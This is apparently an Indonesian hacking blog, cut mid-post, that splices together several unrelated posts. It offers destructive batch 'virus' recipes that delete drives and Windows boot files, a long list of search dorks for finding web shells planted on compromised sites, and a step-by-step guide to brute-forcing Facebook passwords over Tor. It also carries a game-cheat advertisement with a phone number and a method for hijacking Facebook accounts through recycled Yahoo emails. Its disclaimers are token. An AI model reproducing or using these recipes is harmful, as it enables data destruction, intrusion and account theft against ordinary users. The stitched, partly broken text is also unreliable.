colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
[+] Lalu Save As beri nama homo5.vbs dan jangan lupa pilih jenis File (All Files)

6. Virus Untuk Memformat Hardisk
[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad
@echo off
DEL C: -Y
DEL D: -Y
[+] Lalu Save As beri nama homo6.vbs dan jangan lupa pilih jenis File (All Files)
[+] Resiko ditanggung pentester gue gak bertanggung jawab!


Bonus Tutorial Membuat Virus Ganas

[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad

attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
[+] Lalu Save As beri nama homo1.bat dan jangan lupa pilih jenis File (All Files)
[+] Keterangan Untuk Script Code Diatas
      - del c:\autoexec.bat = buat hapus autoexe.bat di direktori C
      - del c:\boot.ini          =  buat hapus Boot.ini di direktori C
      - del c:\ntldr               = buat hapus ntldr
      - del c:\windows\win.ini  = untuk hapus file win.ini yang berlokasi di C:/windows

      - attrib -r -s -h            =  untuk menampilkan file ke 4 windows tadi yang di supper hidden

Perlu lu baca Scripting Kode diatas itu berisi kalimat perintah/memanggil dengan bahasa komputer kalau lo udah sedikit paham bisa berdalih ke postingan gue " Cara Membuat Virus Trojan " disini tingkat kerumitan sama hanya berbeda cara kerja nya

Peringatan Keras "Ini Hanyalah Sebuah Materi Pembelajaran dan jika terjadi kerusakan Sistem Perangkat Lunak Yang mengatasnamakan Blog Gantengers kami tidak akan bertanggung jawab Semua ditanggung oleh pengguna Kode Diatas dan ini hanya untuk bahan Pembelajaran bukan ditujukan untuk merusak dan dosa ditanggung pengguna"

Sekian Tutorial Cara Membuat Virus Komputer Dasar Dengan Notepad semoga bermanfaat untuk menambah wawasan anda dan terima kasih untuk tidak menggunakannya karena bisa berakibat fatal bagi komputer yang menjalankan kode perintah diatas

7 Tingkatan Hacker - Hacker adalah Peretas so what i shame dibidangnya banyak sekali dan semuanya memiliki tingkatan tertentu dari tinggi hingga terendah dan mungkin untuk orang awam Hacker itu adalah perusak dan pencuri nah maka dari itu sebelum lu membaca ini ada baiknya lo " Mengenal Jenis dan Tehnik Serangan Hacker " .




Setelah Membaca Artikel diatas tentu lo sudah tahu kan jenis-jenis hacker dari cara menyerang dan melakukan aksinya , disini gue bakal gue kupas sedikit tentang 7 tingkatan Hacker , ini sebenarnya adalah artikel dari blog lama yang gue migrasi kan ke blog Gantengers.

1. Script Kiddies
Golongan ini adalah golongan pemula atau newbie yang melakukan hacking website atau sistem lain dengan menggunakan program yang sudah dibuat oleh para hacker terdahulu dan berpengalaman.

Script Kiddies hanya menggunakan program-program tersebut tanpa harus mencoba membuat program baru. Mayoritas, mereka hanya mengerti konsep dasar hacking saja. Kebanyakan para Script Kiddies melakukan aksinya dengan dasar iseng dan tidak melakukannya untuk alasan tertentu. Boleh dibilang hanya sebagai pencarian jati diri di dunia hacking.

2. Hacking Group
Hacking Group ini adalah kumpulan orang juga para Script Kiddies yang bersatu untuk tujuan tertentu dan banyak juga master yang menjelma menjadi script kiddies di bangian hackinggroup ini. Mereka akan merasa kuat apabila power, pengalaman dan kemampuan yang mereka miliki digabungkan dalam satu kelompok.

Mayoritas orang-orang dalam Hacking Group ini beraksi dengan tujuan tertentu yang tentunya selain untuk mencari popularitas, mereka juga mencari keuntungan. Dalam Hacking Group ini masih digolongkan dalam beberapa kategori seperti Defacer, Cracker dan Carder.

[+| Defacer adalah kelompok yang suka mengubah tampilan website dengan tujuan untuk menunjukkan eksistensi kelompok dan untuk menyuarakan aspirasi. dan jika masih kurang paham silahkan baca " Pengertian Deface "

[+] Cracker adalah kelompok yang tidak fokus pada penyerangan suatu website. Kelompok ini hanya bertujuan untuk mencari celah kelemahan suatu software berbayar agar dapat digunakan secara bebas dan gratis.

[+] Carder adalah kelompok yang fokus pada peretasan toko-toko online atau bank. Dengan meretas toko online atau bank, mereka akan mendapatkan informasi kartu kredit pelanggan tempat tersebut agar dapat digunakan untuk berbelanja barang lain yang mereka butuhkan.

Dan Perlu diketahui tidak semua defacer cracker atau carder mereka dari Hacking Group jika ilmu sudah tinggi atau sebagainya mereka biasanya ada lah solo player dan tidak menutup kemungkinan mereka menciptakan komunitas yang akan tersohor .

3. Hacktivist
Hacktivist adalah sekumpulan orang yang mempunyai visi dan misi sama. Mereka rata-rata mempunyai keahlian, kemampuan dan pengalaman yang tinggi. Kelompok satu ini menggelar aksinya dengan tujuan politis dan sosial. Salah satu contoh hacktivist terkenal saat ini adalah Anonymous yang juga mempunyai ‘cabang’ di setiap negara. dan perlu lo pahami Anonymous itu bukan suatu organisasi tapi lebih didekatkan tentang peretas yang menyembunyikan identitas

4. Black Hat Professionals
Kelompok ini adalah kelompok yang mahir dalam hal coding. Kelompok ini tidak dapat dimusnahkan atau juga ditemui secara mudah. Mereka akan terus tumbuh dan berkembang. Rata-rata, kelompok satu ini merupakan musuh pemerintah dan pebisnis.

5. Organized Criminal Gangs
Kelompok satu ini boleh dibilang adalah kelompok berbahaya karena mereka secara langsung berada di bawah gang kriminal. Orang-orang dalam kategori ini merupakan orang-orang pilihan yang mempunyai keahlian di atas rata-rata. Mereka beraksi secara halus sehingga pihak kepolisian-pun akan susah untuk mendeteksi atau juga menangkapnya.

6. Nation States
Kelompok satu ini boleh dibilang lebih terorganisasi dan terselubung. Dalam aksinya mereka mengincar infrastruktur penting seperti milik pemerintah, publik, finansial dan militer. Salah satu contohnya adalah munculnya virus flame yang sempat membuat heboh pemerintah Iran di pertengahan tahun 2012 lalu.

7. The Automated Tool
Orang-orang yang masuk dalam kategori ini adalah para pembuat virus berbahaya yang dapat menginfeksi sebuah website atau juga program untuk perangkat elektronik tertentu (PC dan mobile device). Kelompok ini juga dibagi atas kategori dengan dasar tingkat pengalaman dan kemampuan.


Menurut Bankofsecurity.com, untuk menangkal serangan dari ke tujuh golongan ini diharapkan mengerti karakteristik para penyerang terlebih dahulu sebelum membuat penangkalan atau juga pertahanan. Dan menurut pengamatan saya di dunia hacking ini tidak semua dari mereka hanya mengharapkan uang tapi mengharapkan ilmu dan skill tentunya akan digunakan untuk mencari uang .

Sekian artikel tentang 7 Tingkatan Hacker  semoga bisa menambah pengetahuan anda di dunia maya ini dan jika berkenan tolong tinggalkan komentar untuk menambah motivasi untuk kami terima kasih.

Cara Mencari Shell Backdoor yang Sudah Tertanam Di Dalam Website - Shell Backdoor yang Sudah Tertanam di dalam Website tentu seabgian besar dari shell-shell tersebut akan di Index oleh mesih pencari seperti Google Bing dan Yahoo dan inilah trick defacer-defacer untuk menaikan peringkat mereka di Mirror Defacement.

Jika ditanya untuk apa ? shell-shell tersebut sungguh berguna selain untuk berburu backlink web dan sebagainya untuk para blogger dan juga untuk ajang defacement untuk pemula menengah atau mastah semua ruang lingkup , untuk pemula mungkin belum tau disini mastah biasanya mem-baypass shell oh itu masih dirahasiakan , udah puas membaca nya ? oke sekarang silahkan lu liat tutorial nya :
1. Pertama Silahkan Lu Buka Google / Bing.
2. Silahkan lu pilih salah satu code shell dibawah contoh “inurl:.root”.”webr00t cgi shell”
3. Selamat Bekerja

 intitle:webr00t cgi shell
“inurl:.root”.”webr00t cgi shell”
“intitle:Index of */sym”.”inurl:/sym”
“5.2.17 Safe mode:”
“5.2.11 Safe mode:”
“5.2.12 Safe mode:”
“Sifre=webr00t”
“5.2.11 Safe mode:”
“5.2.10 Safe mode:”
“5.2.1 Safe mode:”
intxt:”webadmin.php”
inurl:webadmin.php”
intitle: Linux * 2.6.18-348.1.1.el5PAE
intitle: – WSO 2.3
intitle: – WSO 2.4
intitle: – WSO 2.5
intitle: – WSO 2.5.1
5.2.16 Safe mode: OFF [ phpinfo ] Datetime:
2009 i686 Server IP:
2010 i686 Server IP:
2011 i686 Server IP:
2012 i686 Server IP:
2013 i686 Server IP:
“Userful: gcc, cc, ld, make, php, perl, python, tar, gzip, bzip2, nc, locate”
“Downloaders: wget, lynx, links, curl, lwp-mirror”
“Type Host Login Password Database”
“Execution PHP-code”
“reverse (login -> nigol)”.”/etc/passwd”
” Bind port to /bin/sh [perl]“
“drwxr-xr-x [ home ]“
inurl:wso2.php
inurl:wso2.4.php
inurl:wso2.5.php
inurl:wso2.5.1.php
“Filesystem Size Used Avail Use% Mounted on”
“# Do not remove the following line, or various programs”
inurl:wso.php uid=0(root)
“posix_getpwuid (“Read” /etc/passwd)”
“captain crunch security team” inurl:wso
download wso2.php
download wso2.5.1.php
inurl:sym.php
allinurl: wsotest.php
inurl:wso.php
“-:[ User & Domains & Symlink ]:-“
allinurl: wso.php
inurl:”/wso.php”
allinurl: wso2.5.php
inurl:wso.php
inurl:”sym.php” Symlink Sa 3.0
inurl:wso.php uid=0(root)
“Symlink Sa 3.0″
intitle:Symlink Sa 3.0
inurl:”/wso.php”
inurl:wso.php
inurl:wso2.php
inurl:wso2.5.php
inurl:wso2.5.1.php
wso shell v.1.0 (roots)
inurl:wso.php
allintitle: “[ Home ] [ User & Domains & Symlink ] [ Domains & Script ] [ Symlink File ] [ Symlink Bypass ] “
inurl:”[ Home ] [ User & Domains & Symlink ] [ Domains & Script ] [ Symlink File ] [ Symlink Bypass ] “
intxt:[ Bypass Read ] [ Mass Joomla ] [ Mass WordPress ] [ Mass vBulletin ] [ Help ]
intitle:B-F Config_cPanel
intitle:Blind SQL Injection
intitle:Bypass Disable function
intitle:Carbylamine PHP Encoder
intitle:Change Joomla Index
intitle:Change WP Index
intitle:Converter Havij To Pro
intitle:Cpanel Brute Forcer 2012
intitle:Cpanel Brute Forcer 2011
intitle:Cpanel Brute Forcer 2013
intitle:Cpanel Webmail Brute Forcer
intitle:Face Book Brute Forcer
intitle:zip Filez Server ScaNNer v1.0
“Saudi Sh3ll v1.0″
inurl:wso.php#
Allinurl:wso2.5.1.php#
Allinurl:wso2.5.php#
Allinurl:wso2.4.php#
intitle:wsec_wp GUI v1.0
intitle:Symlink Sa v3.0
intitle:Symlink Sa v2.0
intitle:Symlink Sa v1.0
intitle:king B_F v1.0 Brute Forcer script
intitle:r00t4Lif t00lkit v0.2
allinurl: “wso.php”
intitle:symlink_Sa 2.0
inurl:.php?sws=sec
inurl:.php?sws=sym
inurl:.php?sws=file
inurl:.php?act=selfremove
inurl:.php?act=sql
safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:c99.php
inurl:c99.php uid=0(root)
root c99.php
"Captain Crunch Security Team" inurl:c99
inurl:c99.php
allinurl: c99.php
inurl:c99.php
inurl:"c99.php" c99shell
inurl:c99.php uid=0(root)
c99shell powered by admin
c99shell powered by admin
inurl:"/c99.php"
inurl:c99.php
c99 shell v.1.0 (roots)
inurl:c99.php
allintitle: "c99shell"
inurl:"c99.php
allinurl: "c99.php"
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
allinurl: "c99.php"
inurl:c99.php
inurl:"c99.php" c99shell
inurl:"/c99.php
inurl:/c99.php+uname
allinurl:"c99.php"
inurl:"c99.php"
allinurl:c99.php
"inurl:c99..php"
c99shell [file on secure ok ]?
powered by Captain Crunch Security Team
allinurl:c99.php
"c99.php" filetype:php
allinurl:c99.php
inurl:c99.php
allinurl:.c99.php
"inurl:c99.php"
c99. PHP-code Feedback Self remove
allinurl:c99.php
download c99.php
allinurl:c99.php
inurl:c99.php
allinurl: "c99.php"
intitle:C99Shell v. 1.0 pre-release +uname
allinurl:"c99.php"
inurl:c99.php
safe-mode: off (not secure) drwxrwxrwx c99shell
c99.php download
inurl:c99.php
c99shell filetype:php -echo
inurl:"c99.php"
inurl:c99.php uid=0(root)
allinurl:c99.php
inurl:"/c99.php" intitle:"C99shell"
C99Shell v. 1.0 pre-release build #5
--[ c99shell v. 1.0 pre-release build #16
c99shell linux infong
C99Shell v. 1.0 pre-release build
!C99Shell v. 1.0 beta!
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
!c99shell v. 1+Safe-mode: OFF (not secure)
"C99Shell v. 1.0 pre-release build "
intitle:c99shell +filetype:php
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
intitle:!C99Shell v. 1.0 pre-release build #16! root
!C99Shell v. 1.0 pre-release build #5!
inurl:"c99.php"
C99Shell v. 1.0 pre-release build #16!
intitle:c99shell intext:uname
allintext:C99Shell v. 1.0 pre-release build #12
c99shell v. 1.0 pre-release build #16
--[ c99shell v. 1.0 pre-release build #15 | Powered by ]--
allinurl: "c99.php"
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
"c99shell v 1.0"
ftp apache inurl:c99.php
c99shell+v.+1.0 16
C99Shell v. 1.0 pre-release build #16 download
intitle:c99shell "Software: Apache"
allinurl: c99.php
allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove
intitle:c99shell uname -bbpress
intitle:"index.of" c99.php
inurl:admin/files/
intitle:"index of /" "c99.php"
intitle:"index of" intext:c99.php
intitle:index.of c99.php
intitle:"index of" + c99.php
intitle:index/of file c99.php
intitle:index/of file c99.php
index of /admin/files/
intitle:"Index of/"+c99.php
c99.php "intitle:Index of "
intitle:index.of c99.php
img/c99.php
intitle:index.of c99.php
img.c99.php
intitle:"Index of/"+c99.php
"index of /" c99.php
c99.php
intitle:"Index of" c99.php
"index of" c99.php
"Index of/"+c99.php
safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:c99.txt
inurl:c99.php uid=0(root)
root c99.php
“Captain Crunch Security Team” inurl:c99
download c99.php
inurl:c99.php
allinurl: c99.php
allinurl: c99.txt
inurl:”/c99.php”
inurl:”c99.php” c99shell
inurl:c99.php uid=0(root)
c99shell powered by admin
inurl:”/c99.php”
c99 shell v.1.0 (roots)
allintitle: “c99shell”
inurl:”c99.php
allinurl: “c99.php”
intitle:C99Shell v. 1.0 pre-release +uname
intitle:C99Shell v. 1.0 pre-release +uname
allinurl: “c99.php”
inurl:”c99.php”
inurl:”c99.php”
inurl:”c99.php” c99shell
inurl:”c99.php”
inurl:”/c99.php
inurl:c99.php?
inurl:/c99.php+uname
allinurl:”c99.php”
inurl:”c99.php”
allinurl:c99.php?
“inurl:c99..php”
allinurl:c99.php
c99shell [file on secure ok ]?
inurl:c99.php
powered by Captain Crunch Security Team
allinurl:c99.php
“c99.php” filetypehp
allinurl:c99.php
inurl:c99shell.php
allinurl:.c99.php
“inurl:c99.php”
c99. PHP-code Feedback Self remove
allinurl:c99.php
download c99.txt
inurl:c99shell.txt
allinurl: “c99.php”
allinurl:c99.php
allinurl:c99.php
c99shell
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
allinurl:”c99.php”
inurl:c99.php
safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:/c99.php
inurl:”c99.php”
inurl:c99.php
c99.php download
inurl:”c99.php”
inurl:/c99.php
inurl:”c99.php?”
files/c99.php
c99shell filetypehp -echo
c99shell powered by admin
inurl:”c99.php”
inurl:c99.php uid=0(root)
inurl:”c99.php”
inurl:”/c99.php” intitle:”C99shell”
C99Shell v. 1.0 pre-release build #5
inurl:c99.php
–[ c99shell v. 1.0 pre-release build #16
c99shell linux infong
C99Shell v. 1.0 pre-release build
!C99Shell v. 1.0 beta!
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
!c99shell v. 1+Safe-mode: OFF (not secure)
"C99Shell v. 1.0 pre-release build "
intitle:c99shell +filetypehp
intitle:C99Shell v. 1.0 pre-release +uname
"Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
intitle:!C99Shell v. 1.0 pre-release build #16! root
!C99Shell v. 1.0 pre-release build #5!
C99Shell v. 1.0 pre-release build #16!
intitle:c99shell intext:uname
allintext:C99Shell v. 1.0 pre-release build #12
c99shell v. 1.0 pre-release build #16
--[ c99shell v. 1.0 pre-release build #15 | Powered by ]–
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
“c99shell v 1.0?
ftp apache inurl:c99.php
c99shell+v.+1.0 16
C99Shell v. 1.0 pre-release build #16 download
intitle:c99shell “Software: Apache”
allinurl: c99.php
allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove
Logout
powered by Captain Crunch Security Team
!C99Shell v. 1.0 pre-release build #5!
c99shell v. 1.0 release security
c99shell v. 1.0 pre-release build
c99shell [file on secure ok ]?
C99Shell v. 1.3
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php uid=0(root)
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #16
c99shell[on file]ok
c99shell[file on ]ok
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
“C99Shell v. 1.0 pre”
=C99Shell v. 1.0 pre-release
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
c99shell v. pre-release build
inurl:c99.php c99 shell
inurl:c99.php c99 shell
powered by Captain Crunch Security Team
!C99Shell v. 1.0 pre-release build #5!
intitle:”c99shell” filetypehp root
intitle:”c99shell” Linux infong 2.4
C99Shell v. 1.0 beta !
C99Shell v. 1.0 pre-release build #
allintext:C99Shell v. 1.0 pre-release build #12
“C99Shell v. 1.0 pre”
powered by Captain Crunch Security Team
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:/c99.php?
intitle:C99Shell pre-release
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #16!
C99Shell v. 1.0 pre-release build #16 administrator
intitle:c99shell filetypehp
powered by Captain Crunch Security Team
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #12
c99shell v.1.0
“c99shell v. 1.0 pre-release build”
inurl:”c99.php” filetypehp
“c99shell v. 1.0 “
ok c99.php
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
c99shell v. 1.0 pre-release build #16 |
!C99Shell v. 1.0 pre-release build #5!
!C99Shell v. 1.0 pre-release build #5!
powered by Captain Crunch Security Team
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release
inurl:c99.php exthp
allinurl:”c99.php”
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
powered by Captain Crunch Security Team
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout”
C99Shell v. 1.0 pre-release build #16 software apache
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
“c99shell v 1.0?
allintitle: C99shell filetypehp
C99Shell v. 1.0 pre-release build #16!
“c99shell v. 1.0 pre-release”
c99shell v. 1.0 pre-release build #5
allinurl:”c99.php” filetypehp
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
!C99Shell v. 1.0 pre-release build #16!
intitle:C99Shell v. 1.0 pre-release +uname
c99shell v. 1.0
–[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]–
inurl:”/c99.php”
c99shell +uname
c99shell php + uname
c99shell php + uname
–[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]–
!C99Shell v. 1.0 pre-release build #5!
C99Shell v.1.0 pre-release
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
intitle:c99shell filetypehp
“Encoder Tools Proc. FTP brute”
“c99? filetypehp intext:”Safe-Mode: OFF”
c99shell v. 1.0 pre
intitle:c99shell uname -bbpress
intitle:”index.of” c99.php
inurl:admin/files/
intitle:”index of /” “c99.php”
intitle:”index of” intext:c99.php
intitle:index.of c99.php
intitle:”index of” + c99.php
intitle:index/of file c99.php
intitle:index/of file c99.php
index of /admin/files/
intitle:”Index of/”+c99.php
c99.php “intitle:Index of “
c99.php “intitle:Index of “
c99.php “intitle:Index of “
intitle:index.of c99.php
img/c99.php
intitle:index.of c99.php
img.c99.php
intitle:”Index of/”+c99.php
“index of /” c99.php
intitle:”Index of” c99.php
“index of” c99.php
“Index of/”+c99.php

  
  Berikut ada lah Shell Dorking untuk mencari Mencari Shell Backdoor yang Sudah Tertanam Di Dalam Website , saya tekankan kalo lu udah mendapatkan shell yang work dan memiliki index alangkah baiknya lo ngasih tau adminnya daripada harus menebas index tersebut but dosa ditanggung pengguna gue tidak bertanggung jawab atas apa yang lu lakuin sekian.

Wednesday, 17 September 2014

 
      Kali ini akan berbagi tutorial dan tools Facebook PHP – Cracker. Digunakan untuk crack password account facebook. Cara Crack Facebook 2015, Cara Crack Facebook 2015, Cara Crack Facebook 2015, Cracking Facebook 2014 Facebook Cracking 2014 Cracking Username Facebook 2015 Cracking Account 2015 Facebook Cracking Password Facebook – Facebook Cracking Facebook Cracking Facebook Crack Facebook Crack Video Cracking Facebook User & Password, Crack facebook password free, Crack Facebook password for Free, how to Crack Facebook.com, Crack Facebook, how to Crack a Facebook account, how to Crack Facebook, How to Crack Facebook account? With our site you can Crack any Facebook account, that you need. Online email & password Cracking is simple and will take few minute. Unlimited Facebook Crack, Penelusuran yang terkait dengan facebook Crack, facebook Crack password facebook Crack softwarepirates facebook Crack facebook Crack tool download facebook Crack facebook Crack attack facebook Cracker facebook freezer. Cara Hack Facebook 2015, Hacking Facebook 2014 Facebook Hacking 2014 Hacking Username Facebook 2015 Hacking Account 2015 Facebook Hacking Password Facebook – Facebook Hacking Facebook Cracking Facebook Crack Facebook Hack Video Hacking Facebook User & Password, Hack facebook password free, Hack Facebook password for Free, how to hack Facebook.com, hack Facebook, how to hack a Facebook account, how to hack Facebook, How to hack Facebook account? With our site you can hack any Facebook account, that you need. Online email & password hacking is simple and will take few minute. Unlimited Facebook Hack, Penelusuran yang terkait dengan facebook hack, facebook hack password facebook hack softwarepirates facebook hack facebook hack tool download facebook hack facebook hack attack facebook hacker facebook freezer.

1. Server Local untuk Web Server (XAMPP – Apache)

2. TOR Browser

3. Facebook  PHP – Cracker

4. Wordlist Password

5. PC Dengan Spesifikasi & Koneksi Memadai

Setelah persiapan lengkap, lanjutkan prosesnya:

1. Pastikan pada XAMPP Control Panel, Apache Server Menyala

binushacker-fb-cracker-xampp-nyala

Lakukan pengecekan pada TOR Browser dengan membuka akses ke: http://localhost/ atau http://127.0.0.1

Pastikan tidak ada error dan berjalan dengan baik.

2. Instalasi Script: Facebook PHP – Cracker
Pastikan script diatas disimpan pada direktori ../xampp/htdocs

Kemudian bukalah pada Tor Browser: http://localhost/facebook-cracker.php atau http://127.0.0.1/facebook-cracker.php

Pastikan muncul halaman seperti ini:
3. Menemukan & Menentukan Target User Facebook

Sangat mudah untuk mengetahui username facebook, yaitu hanya dengan mengecek pada URL.

Sebagai contoh: https://www.facebook.com/xxxx.xxxxxxxzahra



Maka usernamenya adalah: xxxx.xxxxxxxzahra

    Kemudian masukkan user tersebut pada kolom bagian: Target Username
    Selanjutnya masukkan password wordlist yang sudah didownload pada kolom bagian: List Password

Contoh silakan lihat gambar selanjutnya.
4. Menjalankan Facebook PHP Cracker

Setelah melakukan input username dan password list sesuai dengan kolom yang tersedia pada Facebook PHP – Cracker.
Tinggal klik: Start Cracking

Kalau berhasil terdapat informasi seperti gambar dibawah:


Selamat anda telah berhasil melakukan cracking, silakan login ke facebook dengan username dan password yang tersedia.

Silakan dicoba dan semoga berhasil :) ^_^ :D =D |o| @@, ;) :-bd :-d


 

Thursday, 11 September 2014

http://landasan-ulin.tk/ - Gratis Game Mode, Full trick Game Online , Full Cit Online Game terbaru.


Downloads Free
No Password
Downloads Map Hack Free
Map Hack File !
No Password

Fitur : - Bug slot kedua Bank

- Anti DC
- MSPD
- ASPD
- Pot no Delay
- Map hack
- Auto pot
- Auto dart
- Santet
- Trans acc alca (Cheat Engine)
- Slip Party
- Anti pet lapar
- Ubah gender
-DLL

Cheat PVP langsung hajar tanpa Konfirmasi

Kmu Ke Elim = Scan 109
Pergi Ke luar Elim arah jam 3 = Scan 113
Di add ganti 213 lalu Freeze


Beberapa cheat tidak kompatible dengan OS, jadi saya buat beberapa cheat. Silahkan dicoba mana yang cocok dengan PC/Laptop anda.
Sudah saya coba di PC dan Laptop dengan OS berbeda, dan hasilnya WORK !!!

Visit us : Albert Yakuza
Jika anda menginginkan jasa joki, atau menanya sesuatu
Contact Me : 087815837266
Jika saya tidak membalas pesan anda, harap bersabar, karena saya tidak memiliki pulsa yg lebih untuk membalas semua pesan anda.

Salam Saya IGN SERVER ELIOS : Soulofguardian

Sunday, 31 August 2014

Note: AKun yg di hack adalah Random (Acak)

Syarat: Email Fb anda harus Yahoo , jika tidak mau bisa pakai fb Tumbal

Cara:
-Import contact Facebook anda ke email yahoo anda,
-jika menemukan email calon korban masukkan ke kolom di link ini Albert Yakuza
-Kalo Vuln, ada kata2" email anda telah didaur ulang" atau yg semacamnya
Kalo tidak vuln akan muncul pertanyaan keamanan atau nomor Hp korban

-Jika sudah dpt yg Vuln, tinggal daftarkan ke Yahoo,
-Buat laporan lupa password di Fb
-Selesai

./Albert Yakuza